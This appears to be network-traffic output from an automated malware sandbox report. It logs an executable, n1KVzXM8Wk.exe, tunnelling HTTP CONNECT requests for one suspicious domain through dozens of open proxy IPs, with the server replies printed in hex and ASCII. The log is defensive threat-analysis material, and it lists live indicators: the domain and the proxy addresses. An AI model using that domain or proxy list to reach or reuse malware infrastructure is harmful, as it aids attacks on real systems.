                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      119192.168.2.4503335.196.111.30204816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.240173101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      120192.168.2.45031882.208.111.19806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.245662928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.771709919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.443732023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.834476948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.443896055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.122039080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.701240063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834676027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      121192.168.2.450247103.78.0.4431296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.245852947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      122192.168.2.450408185.162.228.154806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.245950937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.333352089 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      123192.168.2.450362144.21.53.11131286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.246282101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.693641901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.178006887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.147018909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      124192.168.2.450341161.97.74.176300006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.246383905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      125192.168.2.450347141.94.174.6397966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.246661901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      126192.168.2.450176222.138.76.690026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.246752977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.099842072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.539020061 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      127192.168.2.449742128.199.221.91122596812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.246844053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.365585089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      128192.168.2.450266167.172.86.46104716812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.247071028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      129192.168.2.45036487.106.114.12460056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.247126102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      130192.168.2.449852188.235.0.20781816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.252399921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.513730049 CET994INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:46:25 GMT
                                                                                                      Server: Apache/2.4.55 (Win64) OpenSSL/1.1.1s
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Max-Age: 1000
                                                                                                      Access-Control-Allow-Headers: X-Requested-With, Content-Type, Origin, Authorization, Accept, Client-Security-Token, Accept-Encoding
                                                                                                      Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT
                                                                                                      Content-Length: 530
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      131192.168.2.45037144.226.167.10231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.257987022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.064157009 CET65INHTTP/1.1 200 Connection Established
                                                                                                      Content-Type: text/plain


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      132192.168.2.450309183.100.14.13480006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.263391972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.881094933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.849989891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.490976095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893210888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169954062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.537693977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.147252083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      133192.168.2.45026345.117.179.179556066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.263739109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.974984884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.037539005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      134192.168.2.449935199.102.107.14541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.269578934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      135192.168.2.45034991.202.230.21980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.270549059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      136192.168.2.45041074.119.147.20941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.271419048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      137192.168.2.450274202.162.219.1210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.276185036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      138192.168.2.45043223.95.216.90156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.279874086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      139192.168.2.45040945.43.84.16367886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.280687094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.739905119 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      140192.168.2.450401141.94.174.664386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.289783955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      141192.168.2.450435172.93.111.87493976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.292298079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.678020954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.063678026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.850069046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.490957975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.037657022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.612548113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.716569901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      142192.168.2.45038681.169.187.194806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.300424099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.493988037 CET499INHTTP/1.1 405 Method Not Allowed
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Server: Apache
                                                                                                      Allow: POST,OPTIONS,HEAD,GET
                                                                                                      Content-Length: 315
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      143192.168.2.45042518.135.133.116806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.301192045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.025652885 CET65INHTTP/1.1 200 Connection Established
                                                                                                      Content-Type: text/plain
                                                                                                      Feb 23, 2024 09:45:19.195125103 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 1e bb e8 47 d1 e7 52 13 70 0b b0 e1 4a 6a 16 b6 dd 51 db a1 2d 0c ee eb 97 87 c3 13 e9 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
